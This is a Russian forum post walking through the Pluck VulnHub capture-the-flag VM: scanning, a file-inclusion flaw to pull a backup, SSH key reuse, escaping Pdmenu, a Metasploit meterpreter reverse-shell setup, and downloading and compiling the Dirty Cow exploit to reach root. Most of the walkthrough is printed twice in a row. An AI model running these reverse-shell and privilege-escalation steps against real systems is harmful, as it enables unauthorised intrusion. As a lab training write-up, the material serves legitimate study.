Vander
13.04.2017, 22:32
Привет! В этой статье речь пойдет о CTF - Capture the Flag — это хакерские соревнования. На форуме есть несколько статей подобной тематики, поэтому, я не буду заострять внимание на подробностях, а сразу перейду к делу. Сегодня в качестве уязвимой системы я буду использовать Pluck VM.
https://forum.antichat.xyz/attachments/28953377/img_b6060e007e.png
Скачать уязвимую VM можно отсюда - https://download.vulnhub.com/pluck/
Монтируем образ в VM Ware и запускаем. Теперь необходимо выяснить адрес VM в нашей сети:
> netdiscover – r 172.16.0.1/16
https://forum.antichat.xyz/attachments/28953377/img_c48b6bfcb8.png
Я выделил желтым ее адрес в моей локальной сети. Запустим сканирование портов:
> nmap –p- -A 172.16.0.163
https://forum.antichat.xyz/attachments/28953377/img_5859a11329.png
На данном этапе сканирования, интерес представляет открытый 80 порт и запущенный на нем Apache, к нему присмотримся внимательней, с помощью nikto:
> nikto –hhttp://172.16.0.163
https://forum.antichat.xyz/attachments/28953377/img_2626d471e0.png
Здесь внимание привлекает обнаруженная уязвимость, которая позволит просмотреть все файлы на сервере. Воспользуемся этим, поместим данную информацию в адресную строку браузера.
https://forum.antichat.xyz/attachments/28953377/img_4f646e7ad3.png
Из всего, того, что мы здесь видим, нас больше всего интересует путь к файлу с бэкапом, его и подставим следующим в адресную строку:
https://forum.antichat.xyz/attachments/28953377/img_ba9eebca14.png
Теперь мы знаем, где хранится архив с бэкапом, и можем его вытащить оттуда с помощью wget:
> wget http://172.16.0.163/index.php?page=/backups/backup.tar
https://forum.antichat.xyz/attachments/28953377/img_87c88f2e16.png
Естественно следующим шагом будет распаковка архива:
> tar –xvf index.php\?page\=%2Fbackups%2Fbackup.tar
https://forum.antichat.xyz/attachments/28953377/img_418328f80f.png
Распаковка прошла не совсем удачно, зато мы нашли папку /home и три папки пользователей.
https://forum.antichat.xyz/attachments/28953377/img_b48da2fc71.png
Во всех папках пусто, кроме /paul, внутри находятся файлы со следующим содержимым:
https://forum.antichat.xyz/attachments/28953377/img_cb4e5af774.png
Это не что иное, как файлы ключей ssh, перебирая по порядку, мне удалось залогиниться на сервере с помощью 4-го ключа:
https://forum.antichat.xyz/attachments/28953377/img_1b1be3ae23.png
Встречает нас Pdmenu, для тех кто не в курсе, это такой способ разрешить незнакомому с консолью человеку выполнять какие либо действия на сервере, используя удобное меню, и не заморачиваясь с введением команд. Так оно выглядит:
https://forum.antichat.xyz/attachments/28953377/img_ca5bf2bbd3.png
На мысль об уязвимости наталкивает пункт в меню – Edit File. Вероятно, с его помощью мы сможем выполнить произвольный код.
Для эксплуатации этой уязвимости будем использовать Web Delivery Exploit представленный в Metasploit Framework:
> msfconsole
> use exploit/multi/script/web_delivery
> set target 1
> set payload php/meterpreter/reverse_tcp
> set lhost 192.168.0.106
> set lport 4444
> set srvport 8081
> exploit
https://forum.antichat.xyz/attachments/28953377/img_95b68e46a5.png
Выделенную строку копируем в поле изменения файла:
https://forum.antichat.xyz/attachments/28953377/img_e76c219dfc.png
НО, перед началом строки ставим - ;
Затем жмем enter и выходим из vi, вернувшись на скрин с Metasploit, видим открытую сессию meterpreter:
https://forum.antichat.xyz/attachments/28953377/img_08ce979629.png
Осмотримся в системе и откроем shell:
https://forum.antichat.xyz/attachments/28953377/img_07434b1ea7.png
Для повышения привилегий в системе используем эксплоит Dirty Cow, скачиваем его через шелл на уязвимый хост:
> wgethttps://exploit-db.com/download/40616
https://forum.antichat.xyz/attachments/28953377/img_d932bce847.png
Переименуем сохраненный файл 40616, к примеру, в shell.c и скомпилируем его в исполняемый файл с помощью компилятора gcc и опции –pthread:
> mv 40616 shell.c
> gcc shell.c –o cow –pthread
https://forum.antichat.xyz/attachments/28953377/img_7f1d2e5bc7.png
Запускаем наш готовый файл:
> ./cow
Перейдем в каталог /root
> cd /root
> ls –a
И возьмем флаг:
> cat flag.txt
https://forum.antichat.xyz/attachments/28953377/img_8187487d90.png
На этом прохождение Pluck VM закончено. Спасибо за внимание.
https://forum.antichat.xyz/attachments/28953377/img_b6060e007e.png
Скачать уязвимую VM можно отсюда - https://download.vulnhub.com/pluck/
Монтируем образ в VM Ware и запускаем. Теперь необходимо выяснить адрес VM в нашей сети:
> netdiscover – r 172.16.0.1/16
https://forum.antichat.xyz/attachments/28953377/img_c48b6bfcb8.png
Я выделил желтым ее адрес в моей локальной сети. Запустим сканирование портов:
> nmap –p- -A 172.16.0.163
https://forum.antichat.xyz/attachments/28953377/img_5859a11329.png
На данном этапе сканирования, интерес представляет открытый 80 порт и запущенный на нем Apache, к нему присмотримся внимательней, с помощью nikto:
> nikto –hhttp://172.16.0.163
https://forum.antichat.xyz/attachments/28953377/img_2626d471e0.png
Здесь внимание привлекает обнаруженная уязвимость, которая позволит просмотреть все файлы на сервере. Воспользуемся этим, поместим данную информацию в адресную строку браузера.
https://forum.antichat.xyz/attachments/28953377/img_4f646e7ad3.png
Из всего, того, что мы здесь видим, нас больше всего интересует путь к файлу с бэкапом, его и подставим следующим в адресную строку:
https://forum.antichat.xyz/attachments/28953377/img_ba9eebca14.png
Теперь мы знаем, где хранится архив с бэкапом, и можем его вытащить оттуда с помощью wget:
> wget http://172.16.0.163/index.php?page=/backups/backup.tar
https://forum.antichat.xyz/attachments/28953377/img_87c88f2e16.png
Естественно следующим шагом будет распаковка архива:
> tar –xvf index.php\?page\=%2Fbackups%2Fbackup.tar
https://forum.antichat.xyz/attachments/28953377/img_418328f80f.png
Распаковка прошла не совсем удачно, зато мы нашли папку /home и три папки пользователей.
https://forum.antichat.xyz/attachments/28953377/img_b48da2fc71.png
Во всех папках пусто, кроме /paul, внутри находятся файлы со следующим содержимым:
https://forum.antichat.xyz/attachments/28953377/img_cb4e5af774.png
Это не что иное, как файлы ключей ssh, перебирая по порядку, мне удалось залогиниться на сервере с помощью 4-го ключа:
https://forum.antichat.xyz/attachments/28953377/img_1b1be3ae23.png
Встречает нас Pdmenu, для тех кто не в курсе, это такой способ разрешить незнакомому с консолью человеку выполнять какие либо действия на сервере, используя удобное меню, и не заморачиваясь с введением команд. Так оно выглядит:
https://forum.antichat.xyz/attachments/28953377/img_ca5bf2bbd3.png
На мысль об уязвимости наталкивает пункт в меню – Edit File. Вероятно, с его помощью мы сможем выполнить произвольный код.
Для эксплуатации этой уязвимости будем использовать Web Delivery Exploit представленный в Metasploit Framework:
> msfconsole
> use exploit/multi/script/web_delivery
> set target 1
> set payload php/meterpreter/reverse_tcp
> set lhost 192.168.0.106
> set lport 4444
> set srvport 8081
> exploit
https://forum.antichat.xyz/attachments/28953377/img_95b68e46a5.png
Выделенную строку копируем в поле изменения файла:
https://forum.antichat.xyz/attachments/28953377/img_e76c219dfc.png
НО, перед началом строки ставим - ;
Затем жмем enter и выходим из vi, вернувшись на скрин с Metasploit, видим открытую сессию meterpreter:
https://forum.antichat.xyz/attachments/28953377/img_08ce979629.png
Осмотримся в системе и откроем shell:
https://forum.antichat.xyz/attachments/28953377/img_07434b1ea7.png
Для повышения привилегий в системе используем эксплоит Dirty Cow, скачиваем его через шелл на уязвимый хост:
> wgethttps://exploit-db.com/download/40616
https://forum.antichat.xyz/attachments/28953377/img_d932bce847.png
Переименуем сохраненный файл 40616, к примеру, в shell.c и скомпилируем его в исполняемый файл с помощью компилятора gcc и опции –pthread:
> mv 40616 shell.c
> gcc shell.c –o cow –pthread
https://forum.antichat.xyz/attachments/28953377/img_7f1d2e5bc7.png
Запускаем наш готовый файл:
> ./cow
Перейдем в каталог /root
> cd /root
> ls –a
И возьмем флаг:
> cat flag.txt
https://forum.antichat.xyz/attachments/28953377/img_8187487d90.png
На этом прохождение Pluck VM закончено. Спасибо за внимание.